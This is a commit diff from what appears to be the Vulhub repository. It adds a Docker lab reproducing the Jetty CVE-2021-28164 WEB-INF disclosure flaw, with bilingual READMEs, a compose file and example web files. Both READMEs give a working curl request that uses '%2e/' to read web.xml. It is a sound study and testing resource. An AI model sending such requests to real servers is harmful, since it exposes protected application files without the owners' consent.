first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
jetty/CVE-2021-28164/1.png
Normal file
BIN
jetty/CVE-2021-28164/1.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 84 KiB |
BIN
jetty/CVE-2021-28164/2.png
Normal file
BIN
jetty/CVE-2021-28164/2.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 127 KiB |
40
jetty/CVE-2021-28164/README.md
Normal file
40
jetty/CVE-2021-28164/README.md
Normal file
@@ -0,0 +1,40 @@
|
||||
# Jetty Ambiguous Paths Information Disclosure Vulnerability (CVE-2021-28164)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Eclipse Jetty is a Java web server and Java Servlet container.
|
||||
|
||||
Jetty release 9.4.37 introduced a more precise implementation of RFC3986 with regards to URI decoding, together with some new compliance modes to optionally allow support of some URI that may have ambiguous interpretation within the Servlet specified API methods behaviours. The default mode allowed % encoded . characters to be excluded for URI normalisation, which is correct by the RFC, but is not assumed by common Servlet implementations.
|
||||
|
||||
The default compliance mode allows requests with URIs that contain `%2e` or `%2e%2e` segments to access protected resources within the WEB-INF directory. For example a request to `/context/%2e/WEB-INF/web.xml` can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.
|
||||
|
||||
This bug is fixed on version 9.4.39.
|
||||
|
||||
Reference links.
|
||||
|
||||
- https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5
|
||||
- https://xz.aliyun.com/t/10039
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Execute the following command to start a Jetty 9.4.37 server.
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the server starts, visit ``http://your-ip:8080`` to see an example page.
|
||||
|
||||
## Exploit
|
||||
|
||||
The sensitive file web.xml is not accessible through `/WEB-INF/web.xml`.
|
||||
|
||||
|
||||
|
||||
Use `%2e/` to bypass the restriction:
|
||||
|
||||
```
|
||||
curl -v 'http://192.168.1.162:8080/%2e/WEB-INF/web.xml'
|
||||
```
|
||||
|
||||
|
||||
34
jetty/CVE-2021-28164/README.zh-cn.md
Normal file
34
jetty/CVE-2021-28164/README.zh-cn.md
Normal file
@@ -0,0 +1,34 @@
|
||||
# Jetty WEB-INF 敏感信息泄露漏洞(CVE-2021-28164)
|
||||
|
||||
Eclipse Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境。
|
||||
|
||||
Jetty 9.4.37引入对RFC3986的新实现,而URL编码的`.`字符被排除在URI规范之外,这个行为在RFC中是正确的,但在servlet的实现中导致攻击者可以通过`%2e`来绕过限制,下载WEB-INF目录下的任意文件,导致敏感信息泄露。该漏洞在9.4.39中修复。
|
||||
|
||||
参考链接:
|
||||
|
||||
- https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5
|
||||
- https://xz.aliyun.com/t/10039
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
执行如下命令启动一个Jetty 9.4.37:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
服务启动后,访问`http://your-ip:8080`可以查看到一个example页面。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
直接访问`/WEB-INF/web.xml`将会返回404页面:
|
||||
|
||||
|
||||
|
||||
使用`%2e/`来绕过限制下载web.xml:
|
||||
|
||||
```
|
||||
curl -v 'http://192.168.1.162:8080/%2e/WEB-INF/web.xml'
|
||||
```
|
||||
|
||||
|
||||
8
jetty/CVE-2021-28164/docker-compose.yml
Normal file
8
jetty/CVE-2021-28164/docker-compose.yml
Normal file
@@ -0,0 +1,8 @@
|
||||
version: '2.2'
|
||||
services:
|
||||
web:
|
||||
image: vulhub/jetty:9.4.37
|
||||
ports:
|
||||
- "8080:8080"
|
||||
volumes:
|
||||
- ./src:/opt/jetty/webapps/ROOT
|
||||
7
jetty/CVE-2021-28164/src/WEB-INF/web.xml
Normal file
7
jetty/CVE-2021-28164/src/WEB-INF/web.xml
Normal file
@@ -0,0 +1,7 @@
|
||||
<!DOCTYPE web-app PUBLIC
|
||||
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
|
||||
"http://java.sun.com/dtd/web-app_2_3.dtd" >
|
||||
|
||||
<web-app>
|
||||
<display-name>Archetype Created Web Application</display-name>
|
||||
</web-app>
|
||||
47
jetty/CVE-2021-28164/src/index.jsp
Normal file
47
jetty/CVE-2021-28164/src/index.jsp
Normal file
@@ -0,0 +1,47 @@
|
||||
|
||||
<!doctype html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Example Domain</title>
|
||||
|
||||
<meta charset="utf-8" />
|
||||
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1" />
|
||||
<style type="text/css">
|
||||
body {
|
||||
background-color: #f0f0f2;
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
|
||||
|
||||
}
|
||||
div {
|
||||
width: 600px;
|
||||
margin: 5em auto;
|
||||
padding: 2em;
|
||||
background-color: #fdfdff;
|
||||
border-radius: 0.5em;
|
||||
box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
|
||||
}
|
||||
a:link, a:visited {
|
||||
color: #38488f;
|
||||
text-decoration: none;
|
||||
}
|
||||
@media (max-width: 700px) {
|
||||
div {
|
||||
margin: 0 auto;
|
||||
width: auto;
|
||||
}
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div>
|
||||
<h1><% out.println("Example Domain"); %></h1>
|
||||
<p>This domain is for use in illustrative examples in documents. You may use this
|
||||
domain in literature without prior coordination or asking for permission.</p>
|
||||
<p><a href="https://www.iana.org/domains/example">More information...</a></p>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
Reference in New Issue
Block a user